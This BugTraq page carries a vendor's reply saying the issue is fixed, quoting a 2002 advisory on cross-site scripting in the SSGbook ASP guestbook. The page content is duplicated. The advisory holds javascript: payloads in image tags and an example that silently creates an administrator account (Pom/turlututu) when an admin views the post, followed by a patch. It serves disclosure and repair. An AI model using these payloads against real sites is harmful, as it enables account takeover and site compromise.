BugTraq
Back to list
|
Post reply
Re: SSGbook (ASP)
Oct 01 2003 09:11PM
Terry Bankert (tbankert script-shed com)
In-Reply-To: <F127ak1HTJcwXAtPyFC00019ee5 (at) hotmail (dot) com [email concealed]>
This issue has been fixed
>Received: (qmail 27350 invoked from network); 8 Oct 2002 17:28:07 -0000
>Received: from outgoing2.securityfocus.com (HELO outgoing.securityfocus.com) (205.206.231.26)
> by mail.securityfocus.com with SMTP; 8 Oct 2002 17:28:07 -0000
>Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])
> by outgoing.securityfocus.com (Postfix) with QMQP
> id D0E078F2A1; Tue, 8 Oct 2002 10:36:42 -0600 (MDT)
>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>
>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>
>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>
>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]
>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]
>Received: (qmail 25496 invoked from network); 8 Oct 2002 17:08:44 -0000
>X-Originating-IP: [80.236.134.100]
>From: "Frog Man" <leseulfrog (at) hotmail (dot) com [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: SSGbook (ASP)
>Date: Tue, 08 Oct 2002 19:31:54 +0200
>Mime-Version: 1.0
>Content-Type: text/plain; charset=iso-8859-1; format=flowed
>Message-ID: <F127ak1HTJcwXAtPyFC00019ee5 (at) hotmail (dot) com [email concealed]>
>X-OriginalArrivalTime: 08 Oct 2002 17:31:54.0466 (UTC) FILETIME=[9835BC20:01C26EF0]
>
>Informations :
>°°°°°°°°°°°°°°
>Product : SSGbook
>Langage : ASP
>Tested version : 1
>Website : http://www.script-shed.com
>Problem : Cross Site Scripting
>
>PHP Code / location :
>°°°°°°°°°°°°°°°°°°°°°
>----------------- config.asp ----------------------
>fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
>fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
>fString = doCode(fString, "[img=right]","[/img=right]","<img align=right
>src=""",""" id=right border=0>")
>fString = doCode(fString, "[image=right]","[/image=right]","<img align=right
>src=""",""" id=right border=0>")
>fString = doCode(fString, "[img=left]","[/img=left]","<img align=left
>src=""",""" id=left border=0>")
>fString = doCode(fString, "[image=left]","[/image=left]","<img align=left
>src=""",""" id=left border=0>")
>----------------- config.asp ----------------------
>
>Exploit :
>°°°°°°°°°
>[image]javascript:{SCRIPT}[/image]
>[img=right]javascript:{SCRIPT}[/img=right]
>[image=right]javascript:{SCRIPT}[/image=right]
>[img=left]javascript:{SCRIPT}[/img=left]
>[image=left]javascript:{SCRIPT}[/image=left]
>[img]javascript:{SCRIPT}[/img]
>
>
>e.g. :
>[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Acc
ess&UserName=Pom&Password=turlututu";[/image]
>
>Add an admin if an admin read it. Login : Pom, Password : turlututu
>
>Patch :
>°°°°°°°
>In config.asp :
>Add this line :
>
> strOutput = Replace(strOutput, chr(34), """)
>
>after
>
>----------------------------------------------
> strOutput = Replace(strOutput, "<", "<")
> strOutput = Replace(strOutput, ">", ">")
>----------------------------------------------
>
>And replace this lines :
>
>
>------------------------------------------------
> fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
> fString = doCode(fString, "[image]","[/image]","<img src=""","""
>border=0>")
> fString = doCode(fString, "[img=right]","[/img=right]","<img align=right
>src=""",""" id=right border=0>")
> fString = doCode(fString, "[image=right]","[/image=right]","<img
>align=right src=""",""" id=right border=0>")
> fString = doCode(fString, "[img=left]","[/img=left]","<img align=left
>src=""",""" id=left border=0>")
> fString = doCode(fString, "[image=left]","[/image=left]","<img align=left
>src=""",""" id=left border=0>")
>------------------------------------------------
>
>
>by :
>
>------------------------------------------------
> fString = doCode(fString, "[img]http://","[/img]","<img src=""http://","""
>border=0>")
> fString = doCode(fString, "[image]http://","[/image]","<img
>src=""http://",""" border=0>")
> fString = doCode(fString, "[img=right]http://","[/img=right]","<img
>align=right src=""http://",""" id=right border=0>")
> fString = doCode(fString, "[image=right]http://","[/image=right]","<img
>align=right src=""http://",""" id=right border=0>")
> fString = doCode(fString, "[img=left]http://","[/img=left]","<img
>align=left src=""http://",""" id=left border=0>")
> fString = doCode(fString, "[image=left]http://","[/image=left]","<img
>align=left src=""http://",""" id=left border=0>")
>------------------------------------------------
>
>
>
>
>More details in french :
>http://www.frog-man.org/tutos/SSGbook.txt
>
>translated by Google :
>http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2
Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flangua
ge_tools
>
>
>frog-m@n
>
>
>_________________________________________________________________
>Discutez en ligne avec vos amis ! http://messenger.msn.fr
>
>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
This issue has been fixed
>Received: (qmail 27350 invoked from network); 8 Oct 2002 17:28:07 -0000
>Received: from outgoing2.securityfocus.com (HELO outgoing.securityfocus.com) (205.206.231.26)
> by mail.securityfocus.com with SMTP; 8 Oct 2002 17:28:07 -0000
>Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])
> by outgoing.securityfocus.com (Postfix) with QMQP
> id D0E078F2A1; Tue, 8 Oct 2002 10:36:42 -0600 (MDT)
>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>
>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>
>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>
>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]
>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]
>Received: (qmail 25496 invoked from network); 8 Oct 2002 17:08:44 -0000
>X-Originating-IP: [80.236.134.100]
>From: "Frog Man" <leseulfrog (at) hotmail (dot) com [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: SSGbook (ASP)
>Date: Tue, 08 Oct 2002 19:31:54 +0200
>Mime-Version: 1.0
>Content-Type: text/plain; charset=iso-8859-1; format=flowed
>Message-ID: <F127ak1HTJcwXAtPyFC00019ee5 (at) hotmail (dot) com [email concealed]>
>X-OriginalArrivalTime: 08 Oct 2002 17:31:54.0466 (UTC) FILETIME=[9835BC20:01C26EF0]
>
>Informations :
>°°°°°°°°°°°°°°
>Product : SSGbook
>Langage : ASP
>Tested version : 1
>Website : http://www.script-shed.com
>Problem : Cross Site Scripting
>
>PHP Code / location :
>°°°°°°°°°°°°°°°°°°°°°
>----------------- config.asp ----------------------
>fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
>fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
>fString = doCode(fString, "[img=right]","[/img=right]","<img align=right
>src=""",""" id=right border=0>")
>fString = doCode(fString, "[image=right]","[/image=right]","<img align=right
>src=""",""" id=right border=0>")
>fString = doCode(fString, "[img=left]","[/img=left]","<img align=left
>src=""",""" id=left border=0>")
>fString = doCode(fString, "[image=left]","[/image=left]","<img align=left
>src=""",""" id=left border=0>")
>----------------- config.asp ----------------------
>
>Exploit :
>°°°°°°°°°
>[image]javascript:{SCRIPT}[/image]
>[img=right]javascript:{SCRIPT}[/img=right]
>[image=right]javascript:{SCRIPT}[/image=right]
>[img=left]javascript:{SCRIPT}[/img=left]
>[image=left]javascript:{SCRIPT}[/image=left]
>[img]javascript:{SCRIPT}[/img]
>
>
>e.g. :
>[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Acc
ess&UserName=Pom&Password=turlututu";[/image]
>
>Add an admin if an admin read it. Login : Pom, Password : turlututu
>
>Patch :
>°°°°°°°
>In config.asp :
>Add this line :
>
> strOutput = Replace(strOutput, chr(34), """)
>
>after
>
>----------------------------------------------
> strOutput = Replace(strOutput, "<", "<")
> strOutput = Replace(strOutput, ">", ">")
>----------------------------------------------
>
>And replace this lines :
>
>
>------------------------------------------------
> fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
> fString = doCode(fString, "[image]","[/image]","<img src=""","""
>border=0>")
> fString = doCode(fString, "[img=right]","[/img=right]","<img align=right
>src=""",""" id=right border=0>")
> fString = doCode(fString, "[image=right]","[/image=right]","<img
>align=right src=""",""" id=right border=0>")
> fString = doCode(fString, "[img=left]","[/img=left]","<img align=left
>src=""",""" id=left border=0>")
> fString = doCode(fString, "[image=left]","[/image=left]","<img align=left
>src=""",""" id=left border=0>")
>------------------------------------------------
>
>
>by :
>
>------------------------------------------------
> fString = doCode(fString, "[img]http://","[/img]","<img src=""http://","""
>border=0>")
> fString = doCode(fString, "[image]http://","[/image]","<img
>src=""http://",""" border=0>")
> fString = doCode(fString, "[img=right]http://","[/img=right]","<img
>align=right src=""http://",""" id=right border=0>")
> fString = doCode(fString, "[image=right]http://","[/image=right]","<img
>align=right src=""http://",""" id=right border=0>")
> fString = doCode(fString, "[img=left]http://","[/img=left]","<img
>align=left src=""http://",""" id=left border=0>")
> fString = doCode(fString, "[image=left]http://","[/image=left]","<img
>align=left src=""http://",""" id=left border=0>")
>------------------------------------------------
>
>
>
>
>More details in french :
>http://www.frog-man.org/tutos/SSGbook.txt
>
>translated by Google :
>http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2
Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flangua
ge_tools
>
>
>frog-m@n
>
>
>_________________________________________________________________
>Discutez en ligne avec vos amis ! http://messenger.msn.fr
>
>
[ reply ]